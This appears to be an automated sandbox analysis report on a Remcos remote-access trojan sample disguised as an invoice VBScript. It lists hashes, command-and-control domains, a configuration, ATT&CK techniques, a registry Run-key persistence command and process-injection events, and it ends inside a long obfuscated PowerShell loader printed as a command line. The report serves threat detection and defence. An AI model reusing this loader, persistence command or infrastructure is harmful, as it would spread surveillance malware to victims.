remcos | af154e279f5a8b88fa8d53f212d8ec3299b34bd94c1fe49e2342ed3a87724975

Analysis

max time kernel
150s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
23-11-2022 07:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

INV CI915998.vbs
Size

402KB
MD5

249154effa627787fc5ca1110513b3c2
SHA1

d0b5cbd1272ea1fa66add9b0a302ccb9e091af88
SHA256

af154e279f5a8b88fa8d53f212d8ec3299b34bd94c1fe49e2342ed3a87724975
SHA512

b1cb5bed6ee1dba065dc073421b1cf6c5943fc5eb29bd3a7a5a5a8f78801aae1822070f32c7c0747e89591bf2be1ff734e86484b74b0ae6238db9c8cad9976c2
SSDEEP

12288:r0prEK6Jf6JqHkyVF2uT8DHdVlelVCBpMCdoX:rzqYYOmdVle+Btdw

Score

10^/10

remcos over persistence rat

Malware Config

Extracted

Family

remcos

Botnet

OVER

tochukwu1122.ddns.net:6426

toshiba1122.duckdns.org:6426

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
-0JT2DI
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
Remcos
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

Processes:

powershell.exeieinstal.exe

description	ioc	process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	ieinstal.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

ieinstal.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Software\Microsoft\Windows\CurrentVersion\Run	ieinstal.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Begyndelsesbogstavets = "%tullio% -w 1 $Linial=(Get-ItemProperty -Path 'HKCU:\\SOFTWARE\\AppDataLow\\').Bastardmrtlens;%tullio% ($Linial)"	ieinstal.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

ieinstal.exe

pid process

1172 ieinstal.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exeieinstal.exe

pid process

1420 powershell.exe
1172 ieinstal.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1420 set thread context of 1172 1420 powershell.exe ieinstal.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

4716 powershell.exe
4716 powershell.exe
4684 powershell.exe
4684 powershell.exe
1420 powershell.exe
1420 powershell.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

1420 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 4716 powershell.exe
Token: SeDebugPrivilege 4684 powershell.exe
Token: SeDebugPrivilege 1420 powershell.exe

pid	process
1172	ieinstal.exe

pid	process
1420	powershell.exe
1172	ieinstal.exe

description	pid	process	target process
PID 1420 set thread context of 1172	1420	powershell.exe	ieinstal.exe

pid	process
4716	powershell.exe
4716	powershell.exe
4684	powershell.exe
4684	powershell.exe
1420	powershell.exe
1420	powershell.exe

pid	process
1420	powershell.exe

description	pid	process
Token: SeDebugPrivilege	4716	powershell.exe
Token: SeDebugPrivilege	4684	powershell.exe
Token: SeDebugPrivilege	1420	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

WScript.exepowershell.exepowershell.exepowershell.exe

description	pid	process	target process
PID 4708 wrote to memory of 4716	4708	WScript.exe	powershell.exe
PID 4708 wrote to memory of 4716	4708	WScript.exe	powershell.exe
PID 4716 wrote to memory of 4684	4716	powershell.exe	powershell.exe
PID 4716 wrote to memory of 4684	4716	powershell.exe	powershell.exe
PID 4716 wrote to memory of 4684	4716	powershell.exe	powershell.exe
PID 4684 wrote to memory of 1420	4684	powershell.exe	powershell.exe
PID 4684 wrote to memory of 1420	4684	powershell.exe	powershell.exe
PID 4684 wrote to memory of 1420	4684	powershell.exe	powershell.exe
PID 1420 wrote to memory of 1172	1420	powershell.exe	ieinstal.exe
PID 1420 wrote to memory of 1172	1420	powershell.exe	ieinstal.exe
PID 1420 wrote to memory of 1172	1420	powershell.exe	ieinstal.exe
PID 1420 wrote to memory of 1172	1420	powershell.exe	ieinstal.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\INV CI915998.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4708

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hampegarn = """SkFPauRenWicUntSoiTooVonFu ReHGrTSpBmo Co{sk Un Pl Im TrpPlaInrAnaMumBe(Hy[BeSeptBrrCyitinFogFo]So`$siHSkSMy)Ge;Re Di Ra jv Sl`$TeBIdyLitJaePisTe Un=Is LaNPhePswTi-CoOKobDyjPeeUdcRetAs DebLayMotlaeTi[Ek]un Un(Re`$UnHArSRa.GoLSveKonsugButTohGa Ca/ag Mi2Co)Sh;Bu Da Do Tr QuFSnoTerPi(st`$PriMy=No0Br;Vi Su`$UniKo Si-ValBltGi Ga`$StHReSsa.GrLBeeStnSagNotHehVe;Ha Po`$Ekiva+Ps=sy2Re)Mu{Dr Ra Zl Nu Am Mo Br an Ro`$poBSeyKntCaeMisUn[Fa`$EliCa/Po2Ne]ov Un=Ge Ch[CicSeoPanBrvSueMyrGotBa]Co:Br:ssTTiocoBPayHutFoeFi(Om`$UnHTeSBe.AfSAeuspbAasUntHirSliUnnStgCa(Bi`$NyiRe,Fo us2Cl)su,Op An1To6un)Bu;Su Re Ca`$AuBBeyFotInefisDe[Ca`$SaiJo/In2Ba]He Se=Is Fo(Du`$SlBReyDutdeeMusJu[Bu`$RviSl/Ob2bu]Ko Ph-ThbSoxHyoMarTa af6Un0Ta)Or;Xi Fr Eg Op Ma}Re An[VeSRrthirGriAfnStgXy]be[WhSAfyAmsFitAseFimUn.AdTTueTexPatLo.MiELenIncInoUrdCuiimnSagMe]Na:ve:SfAInSAtCTaIMuIMi.KaGMeeUntPaSUntsarfeidinTagRa(Op`$MobMgyAntSeeBesRe)Um;Un}Ca`$FuAQucsecUnlpoiAnmKraPotVeiLeoBanChsBo0ta=FeHMiTTiBDo Re'In6NeFUn4Ne5Da4spFas4re8te5Ou9Bl5De1Cr1Dr2Sn5Fu8pa5Ch0Wi5vn0Mi'Ta;Sc`$BeAOvcKocKnlTriIomWeaFutHyiGaoLenflsSh1An=beHReTEuBNo Op'Pa7Ov1be5Pr5Er5ViFMi4UdEPr5Tu3Pa4BoFHy5Sk3Ot5PiADi4Fd8Ps1Sk2Jo6SeBSs5Fi5ti5Sc2Kr0CrFMi0ApEGe1Sh2Fr6St9Ju5Vi2Ho4OuFDo5MoDBr5PhANo5Hj9Ka7Un2Ra5NoDHe4Ca8Is5Pr5Co4StAKu5Cl9Sc7Vi1Op5Pa9Ag4My8Ov5Sp4Ro5Di3Au5Ra8Ta4TiFCh'Bo;Or`$PoATvcRecMelDeiVamSpaPetSkiUpoGynGosEx2Sy=flHScTTyBWh Ou'Fo7NeBNe5pt9Po4Bl8Fo6AuCDe4HoEGl5Ca3Tr5NeFUn7MiDEn5Me8Ud5Cu8Op4OuESo5Fo9Re4BrFSu4LrFIm'Di;Sp`$HaASpcBlcAllAniCamExaMatDiiRaohonTasGo3Al=NaHRoTPoBFi Ch'In6PaFBo4Sk5Tr4fgFAc4Em8bo5Im9Ch5Tw1St1In2Ko6KiEMe4sp9Di5Ha2An4fi8Ob5No5sa5bi1Ap5An9Vo1se2Tr7Bi5Ko5St2Cu4St8ra5Ve9Jo4InESt5Bi3Ga4xiCRd6skFAc5Dk9Aa4StEMo4HaAPa5ge5Ge5TrFOs5Si9Al4SeFHa1te2Pr7Lo4Fr5OxDTw5Co2Sk5Ou8Tr5be0Fo5Pu9me6StENo5Un9Ty5PeABr'Je;Ek`$AkAPrcFocSklSeimomDyahvtAtiNooOnnLasEk4Ha=reHElTArBOb Fa'un4DrFLe4Va8Ma4RuEHo5Pi5Do5Lu2El5BlBAb'Jo;Ho`$ReATycKrcNulKoibimBaaImtRoiRaoBrnKosUn5Fa=PhHMoTSnBSp Ri'ma7UnBEm5ek9Fl4Lo8Ha7Be1Sv5pr3Do5Si8Ca4Bl9Pr5ju0Gn5Fu9Be7bo4Ko5SkDKa5Ct2Gn5Ar8De5Br0st5He9Ma'Ti;Op`$MiAGacVicSelstiRemBaaGatReiJioqunEgsLo6Re=CoHFrTScBso Ga'Ma6UdENe6Ur8Un6UnFAf4SuCst5La9Ko5rbFKo5Ae5Di5SpDTe5Va0Sp7Co2Fl5ToDOr5Tr1ci5St9Hk1Sk0Fl1FrCRu7Su4Fr5Cl5Co5vr8Af5Po9Ta7RoEHy4Fu5sa6PsFGi5In5Va5FoBli1sh0Em1BaCco6KeCAn4Fl9Co5suEBu5Co0Fo5Co5Ti5PrFAb'Re;Pa`$ArAPocIncGrlBaiDamFiaMitpaiUnoSlnSpsMi7Ox=EkHHeTfiBGe Ca'Ca6InESi4Fa9Sa5Da2Un4Lo8Ta5So5Ng5Ps1wa5Po9us1fu0At1afCSc7Ob1pu5MiDTr5Pi2Ud5SeDPi5StBRh5Ka9Ba5He8Su'Di;St`$PrASecSlcStlStiBamkaaLetAfiAroFonDusH 8Ha=DeHIkTUnBFo Sc'si6DdEBr5In9Fa5ReALa5Bl0De5No9En5PrFBr4De8Ku5El9Pr5Gn8di7Mi8Ov5Se9Im5Rr0Re5Ri9Fo5AfBFj5heDfi4Bl8Ot5In9No'Ho;ac`$SuAHacVicOplPriMemNeaLitStiJuoprnElsFo9ba=SpHErTInBRe Hi'om7Ub5Ku5Th2Po7Fi1Er5An9St5Ka1Pr5br3id4NoERi4Er5Re7an1pr5Gr3Ov5Sp8Al4Mo9Wi5Fj0Fg5Ro9Ga'Sp;Ud`$MaOspvUneBerMisFuoSoeSviResSpkCheCh0ex=coHLaTSoBIn Ou'Af7bi1Su4Sa5In7St8Un5Sk9Re5Ka0Fi5Kv9Ca5vrBNa5AgDRi4Wo8Ti5As9Di6Pe8Ti4Ly5Un4lgCUn5al9Co'Un;Be`$ScORavSieSnrUnsCaoEneFeiResMskHoeSg1Kr=BrHafTHaBRe No'Am7DiFDi5ga0St5ThDhy4DeFBa4PrFOp1Ba0Sk1SmCSy6PoCFl4Af9se5ChEGr5bo0Fo5Kl5Vo5MuFFo1He0ek1NoCTr6ShFPr5Vo9Gr5agDLa5So0be5Eu9Ke5Su8Hj1Ve0Wa1JtCSu7FoDIn5Gu2To4ExFPa5De5Co7PeFDo5Ri0Qu5blDas4UnFIn4FiFOl1je0Bo1OmCPi7RnDGa4Co9Or4Dr8Ey5Ro3Bl7OpFTr5Po0Ch5LiDBa4HoFAn4DaFOv'Ge;Mo`$SkOSevprePyrFosPloepesaiUnsRukAfeDe2Pr=BlHClTMeBUn Pl'si7Ef5De5Sp2Ac4FoASk5Pi3Ba5Op7Re5Pa9Ma'Da;Fy`$CaOTavuneKorPesTroBreKoiRksUdkBdeUn3Ry=FuHUnTBeBCo Pr'Pr6FlCMi4Hy9Co5SeEFl5Sm0Sv5Ud5Sa5keFFi1Bi0De1MiCSk7Te4Fo5un5Wo5Af8Di5Fa9ba7PtEUn4Tr5in6AvFTr5Be5At5PaBUn1Tr0Fr1KoCEn7Sl2Me5Pe9tr4StBTh6OpFDu5Re0Fo5Ho3br4Ag8Ka1sl0Un1BeCIn6NyAOp5Wi5La4InESm4Me8Fo4Ud9Sr5naDPr5Et0Ho'Af;Ud`$DiOGlvKueOvrFesMioFeeNyiInsBokUnere4In=CrHHaTBaBsl No'Ph6NeAMi5Su5Co4DoELe4pl8Hu4Tu9Mo5ElDHi5Am0Op7StDki5Ab0Nu5Ve0St5Ti3mu5HaFSn'Ae;Pr`$InOVivNueUnrGasGuosteQuiFlsTakDeeAb5Sn=SaHBiTUnBmi Ps'Kl5De2Py4Tu8Ud5Ub8Da5He0Gy5Gi0Ti'Ku;Ne`$EcOAlvIleRirAdsReoLeeSuiTysBakUneFl6Al=SeHStTTjBSv Ud'Tu7Un2Wh4Pe8Po6UdCOv4AlESk5Pr3Fu4In8Ti5Kr9Sl5hiFOp4An8Hy6FoAHy5Bl5Sm4PaECo4Bl8ek4Fo9Fu5DiDSp5Un0Fi7Us1Br5Ua9Va5sp1Ci5He3Hv4ReEUn4Ra5Op'Fi;Pm`$TeOBlvOlecordasKroUneThiVesTekBreTo7ob=EmHItTNeBev Se'Au7Li5Sc7Fo9Mi6Ti4Pu'Fa;Cy`$HaOAlvCaePerDesHjoateAniKusTokUneSh8Ha=PsHAnTHeBPo Ap'He6El0Bu'Di;FlSCreMutSu-SmALilUniGaaIcsUh By-ManhoaPamAaesv PaOTrvAaeOprDrsInoafeDviSesRekSkeCo9Mu Ek-DivQuaLolUnuCoeFo Ad`$CaOHevUleTirHysIsoTaeTriBesPakAfeSe7Fr;MefSouRinTocSptluiBiogenSn anfMekPrpGo Be{asPEnaThrNuaBemSu Ho(Fr`$Savtr_SpmMa,ca Ge`$EnvAl_UnpKa)Sk Sp De Un Ta En;Wr`$PaKExaBrnOpdOviFidRwaFotSkfafeKnsPitkaeAfrUd0Be Eu=opHHeTSlBAf fl'Ci1Fo8ph4inAho4Ep9Ev5Af2Br5Ga1Sh1RaCjo0Kl1Sh1LaCTr1Ko4Pl6Ly7Af7VeDKo4UnCSe4PrCJo7Op8Co5li3Kr5Ko1De5WaDbr5Za5Su5Kr2Sy6Ap1sc0et6St0Ty6Wi7GeFAr4Kn9Al4saESv4PoEEl5di9Me5be2Se4St8Se7Pe8Ta5Os3op5Ec1To5InDGh5Ps5So5Af2Wi1St2Sn7BeBSe5dd9Gt4Ba8ku7UnDGi4KaFAf4EnFJa5Sk9Ju5De1Mt5LiEMa5Re0Sc5Re5Sa5Ve9In4MiFSk1ti4re1Be5In1KiCVe4Tz0Fe1YtCTr6BaBGr5dk4so5Hj9Re4HoEde5Et9Od1bl1Va7Su3Ru5FoEMe5Fe6Ur5Ru9Ad5InFfe4Bl8Dr1MyCBa4in7Pr1SaCUd1Le8Gu6Va3Ho1Af2Be7auBFl5Af0Se5Ge3Bo5KaEMa5diDTi5An0Sy7SkDFa4BeFVe4InFMe5mi9Sg5Da1Ge5SiECa5Bi0Ju4Na5Se7HaFNa5ChDBo5TrFPo5Fo4Ef5Th9Be1TuCCe1Di1Ra7UnDVi5An2Br5Wa8Sk1StCIn1Af8Sp6Sp3Dr1Tr2Dr7Hs0Fl5Da3Me5crFDr5UnDDe4Ri8Fo5Sw5Ni5Me3Du5Be2Un1Ph2Sk6SuFGa4BeCTo5Ap0Ho5Ca5Im4El8no1Ca4Bu1Va8Da7Fe3Gn4peADe5Za9Su4ViERa4UnFUd5Fo3Si5Na9In5Ti5Fo4BeFSa5Ta7Ko5Sk9Hy0Dr4Su1Ga5Ba6Ob7Rr1Do1Di0FrDPh6Ad1Go1Cr2Pe7ly9Im4StDIr4Bd9Na5ShDFo5en0Ma4VvFEr1En4Ap1Fr8in7PiDPr5UnFin5FiFNe5Va0en5No5Ga5Ob1An5SnDVi4Mi8Fr5Ro5Ba5Al3An5Ar2Du4NoFUa0ChCHo1Mo5Ca1SpCBe4Se1Ma1Re5Uk1Fa2Ro7BrBDi5Ci9St4ro8Tr6Bl8Pe4Fl5So4HaCEn5Ba9Dr1Ho4Mi1Sh8In7QuDDe5BaFEs5CoFBa5Sk0Ba5Fr5Qu5Ph1St5SeDOv4Li8Tr5Na5Fa5Sq3No5Lk2Re4GeFTr0InDKo1Sp5Po'Re;SoOPrvSteNorUfsPhoSteGoiSasMikUreFe9Tr Fo`$CiKLoaStnPrdPaiWodOuaDatKnfFieNosUntSwesyrDi0Pu;Ge`$StKFoajanTudSoiPidTaaKrtSefFreCosIntReeParFa5ta Sm=Cu StHReTTrBTe No'De1Fl8Ba4SpARe5CuDAn4OvEun6Di3Sk5PoBMo4TiCRe5StDFe1UnCGl0Kl1Be1HyCFu1Be8Ku4inACo4Ba9th5Kr2Go5Ep1Hn1An2De7UdBMo5Va9Re4Af8Dr7Lo1Ep5Pa9kp4Pr8En5Pi4Iv5Op3Mo5Pe8Pa1Sl4Fa1Le8Nu7ChDKb5HaFSt5BrFMa5Sa0Pr5Va5Na5Hj1Ar5MiDRe4Eu8Su5fo5Ne5Br3Kv5Sa2Un4SlFPl0EpEVe1Se0de1WoCHo6Wa7Dr6Aa8Sk4Af5Ne4SkCCu5Ud9Ge6Sa7En6Me1Ap6Fl1Bj1SlCAf7GeCZa1St4Fa1Su8Te7SpDAr5StFCo5PlFJe5Ki0Or5Ti5Va5Ad1Ko5FiDRe4Cr8In5Ov5Bi5In3Fl5Bo2Pa4TeFSn0OrFIn1Ov0An1lvCDa1Re8Sp7shDUr5miFla5TrFku5In0Ha5La5Ae5Fe1Di5GeDTi4Mo8Se5Pe5Go5Yd3Th5Ta2Pa4QuFSu0Gr8De1Ko5In1Va5Le'De;unOPivReesprLasEnohiePriFosPekEnefs9Ga Ko`$ReKThaGunIgdCoiNidUsaFrtUmfSaeEnsVitFoeFarPa5Hu;Su`$woKDoaBrnSmdMiiUldHoaAftFrfSpeCasPutNoeKrrTh1Su Su=Cr OuHBrTUnBUn In'Gr4FrEAn5Ud9Ta4Tu8Di4Ch9Af4LuEFl5be2De1FaCSe1al8Aa4NaAOp5ReDBo4ReEKo6Es3Sa5paBPa4UdCFo5UnDBr1Am2Os7ym5Ti5Te2Di4DeASv5Ma3Sp5Ry7Pr5Br9Fe1Ul4Me1ch8Ar5In2Hy4Po9Ma5Om0Ka5Af0En1Ov0so1TeCPl7MiCLu1Un4Te6un7an6UlFOb4Be5Sh4TrFHs4Vo8Po5So9Ch5Ln1Re1No2Un6InENo4Un9Ko5To2Ac4Ud8Be5Af5Fi5Br1Dr5Ur9Lu1No2Va7af5No5Fe2St4Ri8Am5Un9Su4SaETr5Bl3Re4quCPr6SkFGd5fe9Sp4GuETr4ApASk5pa5Te5DoFel5Su9si4HyFCa1Te2Su7Sn4Un5AdDKa5un2br5Ti8Un5Ca0Un5Un9In6EnESm5Ca9Di5HaAFi6Re1gi1Br4Ci7Pi2Ar5Na9Sm4SpBSn1re1Me7Su3Cl5ChEIn5Sv6Ae5Se9Cl5FlFCa4Br8Mo1SuCCo6ReFUn4Fo5Si4WaFBe4Sa8Ni5Pr9Ho5Ki1Im1br2Un6UnEFn4st9Ls5Pu2Hy4Ou8Pr5Ga5Un5Un1Bo5Fl9Ud1Ba2Re7Ar5Po5Ch2Ov4Re8Ud5Dy9tr4euEku5To3Tr4PrCOs6CoFpa5du9Ha4ptEFo4HeASv5Oe5th5CoFMa5Ma9se4NeFSt1Na2Fl7Jo4In5FoDBe5Ko2ou5Mi8Un5Ha0de5ca9Hi6ArEVi5By9Un5PeAHu1Sy4Fr1Fi4Si7Lo2ne5Um9Dr4prBAr1Gl1Oa7sk3Ge5KnEca5Hu6In5be9Ce5DuFRe4Ef8Ca1TvCJu7wi5To5Te2Kv4Uf8Mi6ArCsp4Ch8In4UnEAl1re5Mi1Ke0Sp1SuCTi1Tr4op1Un8Ce4FlASk4ge9Af5Fo2Li5Te1ve1Pr2La7KbBDr5Ga9Ta4Kr8Ha7De1Re5Ud9Jo4Ry8Re5Sy4Sa5St3Na5Va8Sh1Ra4Bi1Ch8St7SkDAf5HaFUn5CuFCl5Ca0St5Eh5Fo5fi1Di5SeDBr4Ti8Id5Co5Ku5Su3Ve5Cr2Bl4PaFRe0Pr9Re1Su5ty1La5Na1Su2Nd7Rh5ov5Su2La4paAMi5Ar3Sm5Bu7Ch5Ex9Sc1Sn4Bi1de8Pa5In2Ra4Ju9Oc5Te0Ko5Fa0Fe1Fa0Ha1UdCMa7AgCOs1Tr4Co1Sk8Co4GyAKo6Dy3In5En1Be1An5Pe1Cr5Ha1St5Em1Sa5Ap1Le0Te1SeCSu1Ol8Vi4SuAMa6Hy3Ag4SkCAl1Re5Mb1So5Me'In;UnOwavSoeRerHesPuoKaeuuiSysHekWaeSq9Sp St`$DaKUnaEknVidafiHidSkaSotovfKaeNosMetFeeAfrDe1Sl;Ko}KvfKouNunhacSttRiiMooPrnek asGTrDDrTAs St{BePNoaUnrUnaPamar St(Be[DePocaMnrVoaMamUneSltBleBurim(TyPCooidsMiiUntspiSpoConBi Ka=lo fa0Un,la OvMSaaDenAfdPlaattUpoThrMeysa Mo=Pi Sy`$MeTSurHouSiePr)su]Fo Br[BuTRyyOvpZaein[Ko]Ka]Sc Fo`$ArvTraSkrBe_BupAnaNorSiaElmHaeAntTaeRerSksSm,Pr[LuPWoaJarTraOxmKeeUntEleLorAd(GlPTioposPeiBytIniEsoTmnJy Ud=Co Ty1Bo)Au]Ek An[OpTPuyNopLieSa]Bi An`$KevMarRetSt Bl=Sv Un[CoVGroAsiArdBu]Ir)Em;Tr`$GrKPeaLanKidMeiKodSeaBltlefTreCasKutAreherRe2Hi Za=De LaHanTDaBPu Go'Go1Wa8ya6GiAgi6Sa8Ne7PiEBe1fiCGn0Je1tn1stCPr6Mu7Mo7TrDDe4HaCTo4PiCar7Fi8Ci5Ko3en5Ko1Se5UnDFo5Ad5Ja5Ka2Co6al1Pa0Sc6Be0Eu6In7PaFsu4Ha9In4EnEDr4LyESt5St9La5Po2Ma4Pa8Te7Ud8Op5Gr3Sk5Sk1Ti5udDUt5Op5Ta5Mo2Sk1Fi2Al7Pu8Kd5Ch9pr5ApABr5Fa5Mi5In2An5Su9Un7Bh8Sn4Dy5Mo5Qu2In5SkDGr5Jo1Kr5Di5Ps5KaFti7UnDRs4LaFUn4maFSu5Ma9Ni5Fo1mu5NiEAd5St0Ma4Ec5Be1Pe4ma1mu4gr7Le2Th5St9Pt4HoBUn1Ti1ja7Li3St5KnEIm5Et6Fa5Ex9Ne5OsFBl4Ca8Ho1TuCPa6CoFBi4Di5Ho4SjFUd4Cz8Ti5Fl9Ek5In1Dr1Fr2Sl6PoESe5Ne9Di5ReANo5Ra0Fr5Wa9Du5PeFKn4Be8Fo5Mu5Ra5Pe3je5Te2En1Ma2Ba7FeDRe4RaFTi4BuFPa5Am9In5In1Ca5WaECa5De0Ch4De5Gl7Tc2Di5RiDNo5sk1Re5At9Su1Re4Ba1Do8Te7CrDSa5IsFMa5NoFMe5Re0Jo5Mo5Im5St1Po5OpDOd4Un8Sk5Su5Un5Ni3Me5fr2Co4huFMu0Il4Af1Al5Cu1Uo5Ba1As0Aa1CaCCa6Co7sr6FaFca4El5be4SeFTr4Un8Fd5Ar9Un5fr1Ut1Ac2Un6PaECl5ag9Gl5MiAPr5Ce0Hy5Sm9Un5HeFAa4An8Hy5Ov5Mu5Gt3Bl5Di2Tr1us2Do7Pe9Co5Ja1mo5Kp5Ca4Po8De1Ad2Pr7InDEk4GeFPa4SeFIn5Be9Ad5Di1Si5LaEMi5As0Co4Au5Ld7FuEMe4Sy9se5Kl5Fa5me0Af5Da8br5Fa9Gu4NdEUl7DiDAf5BiFUn5SmFCy5In9Gs4HjFBe4KvFAp6Ga1Ju0Br6Or0Mo6Ov6GiEKl4Th9Ga5Be2In1om5Pr1Li2Ra7Ze8Ti5Te9Pa5AfASo5Pn5pa5ru2Be5Qu9Bd7Me8Go4Am5Sp5Po2Le5PeDTa5Sn1To5Sa5Sl5KeFUd7Pa1Mi5Un3Sn5Fe8Ph4re9Bl5Fa0Am5Dy9Po1Ud4An1St8Tj7ObDMe5EdFAc5LuFKo5Ca0ag5Co5st5Sp1Gu5FrDBa4No8Un5Co5Su5Sl3To5Tr2He4JvFOi0Po5Ca1Fl0Jo1PhCIn1Ta8na5BiAsi5KoDCe5Co0Su4CaFFi5Ti9Sa1Te5Ro1te2In7Sk8Ld5lr9Pn5UnAYd5Hu5Co5Aa2Fu5Is9Om6Sk8Ch4Kl5Un4PsCDe5Vl9Ap1Sd4Fo1Py8Co7Ph3Tr4NuAri5pr9un4InERi4AmFEl5St3El5sl9Be5Fi5Se4KiFTe5Op7La5Me9Re0NeCKl1Ti0Bl1StCAu1Br8Bl7In3Du4ReAEl5sm9Sp4HaESk4DiFTj5mu3Mo5Er9Bo5Ks5Fl4AgFVi5Gr7Pa5Eg9Be0AaDPl1Le0Fo1SeCNe6Ge7Sa6PoFRu4Ja5Co4raFBe4Di8Pl5Kv9Da5Ev1Un1Ra2Pr7Aa1ov4Dr9Lu5Fe0Ou4au8Ma5as5Ta5UnFHa5YeDFe4FlFSu4Un8ca7Br8Ju5Re9In5Bl0Fi5Ch9ba5VrBCy5SyDWi4ur8Lu5Gu9So6Pr1Sp1Mu5Fo'Ov;HuOAuvReeBarsusUnoGnePriCosCekTreMe9He Mn`$CoKDaaprnCudFoiSadHoaeltDrfBaeLesHntNoeSirMa2Op;Im`$DeKBeaLinCydLeipodHeaLetAnfQueBrsSatDreOcrRa3vl Sp=Ta DeHBaTBeBSl Fr'Ha1No8Ba6CoAUn6Be8Ab7RaEAf1Lo2Fi7Ba8Sa5Va9Bu5GeADe5Sj5Ve5Un2Pe5Ub9Pr7SuFGr5He3Pa5Bu2Fr4soFBe4Ns8Ve4TjESt4Ar9Sy5PaFfa4Ry8Us5As3Wa4PlECe1La4Hy1Me8Un7SkDBa5StFAl5HeFPh5Ko0Ml5Ek5Co5un1Ar5InDAf4So8Pr5In5Ra5Br3Ve5Un2Kn4EpFFo0RoAAd1Fr0Ox1HaCSy6fo7Op6AtFKi4Se5Ki4FoFFy4Ra8un5Op9En5Ne1Um1le2Al6FoEPr5Pr9Ud5AnAdu5An0Na5Ix9Sa5AdFDd4Sc8Af5Ba5Kl5Be3Bi5Ne2op1Kl2Ha7MeFSa5YaDOp5jo0Ud5di0Lg5Ru5Er5Bu2Ph5KiBSa7InFFl5ul3No5Se2Sc4RoAMu5nr9Sa5bo2Aa4Un8De5De5or5ra3Ch5St2Ha4PiFTr6Tr1Be0Pi6Re0Sk6Aq6MaFAr4Re8Fe5AlDSl5Ny2Un5Bi8El5SeDMi4ShESt5Sa8Mi1Cu0cr1VeCHe1Lu8Pr4PsABl5IsDRe4NoEgl6So3Ba4LaCRe5NaDAg4PyEAn5PaDPo5Ep1Af5bo9Tm4To8Fl5Op9Un4AnEUn4DiFHa1An5Tr1Co2To6SyFBi5Ev9Ce4Ca8Le7Re5Ov5Fr1Ta4UnCGe5Au0Re5To9Ba5Te1Ac5Re9Ad5Bn2St4Aa8Ag5AsDFo4Di8Va5St5St5As3Af5Do2Un7AfAUs5Ny0Mu5ReDHy5ReBTa4AnFGe1Na4Sk1Ce8Ch7LoDFa5NoFAu5GtFVa5In0Ci5Op5Un5st1Si5FrDSc4Su8Li5Si5Rh5Te3Sk5ry2Br4TiFAl0KrBEg1Kn5Be'im;puORovGteBerSlsHroNeeBliVesCakPreRi9Re Jo`$KeKAnaTmnTrdRoiBrdQuaAdtTrfPaeSmsLotbeeKirBa3te;Qu`$RiKInaCinDidEtiCldAnaDetInfCaeinsAltWeePhrPa4Le Dd=Ra PnHScTClBAl Da'In1Or8Je6TeADa6Ma8Ak7BaEPo1Mi2De7Or8Af5Br9Sa5UdACo5Be5br5Ol2pe5Be9In7Sp1En5Un9Bi4Pe8Ve5Kn4Er5In3Em5Uf8As1Fo4Op1Ab8Sl7Ra3In4BaACh5Bu9un4RyEGa4SpFAd5Sk3Li5ti9Ba5Sa5Au4OsFEm5tk7Fo5Mo9Ph0HvEGs1Sl0Pa1MoCBr1Pl8Se7Vi3El4LnABr5Un9Ve4GlEUd4EkFFu5Ud3Ta5Ma9In5My5St4UsFsa5Po7Un5Be9Br0MuFiz1Pr0In1MoCPe1Sa8Sk4BeASt4GeESm4Cy8Ka1Cy0St1CaCSa1Rv8La4PlABu5SuDGl4PaEPa6Fe3Bk4FuCUn5EnDBv4seEPl5NaDUv5Oo1Pa5Be9Tr4Ju8Hu5An9Sa4ImEFo4AfFRi1So5Pr1Mo2In6PoFFo5Tr9De4Ra8Ky7Ma5Eg5Fi1Ag4ChCRe5Fo0Su5Ca9Ex5Ch1Un5Si9Un5Re2Ac4To8re5JoDAa4Si8Ca5Su5El5Vi3fu5Lo2Fl7KiAPo5Un0Tr5frDSw5EkBKo4UnFBe1He4Hr1Lu8Mo7ReDRe5ReFSn5TrFUn5Sp0Th5Ra5Un5Kd1Di5KrDTe4Sv8Ce5Co5Pr5Ca3Pr5Fi2Kr4EjFDy0DiBru1Mi5In'Mi;ReO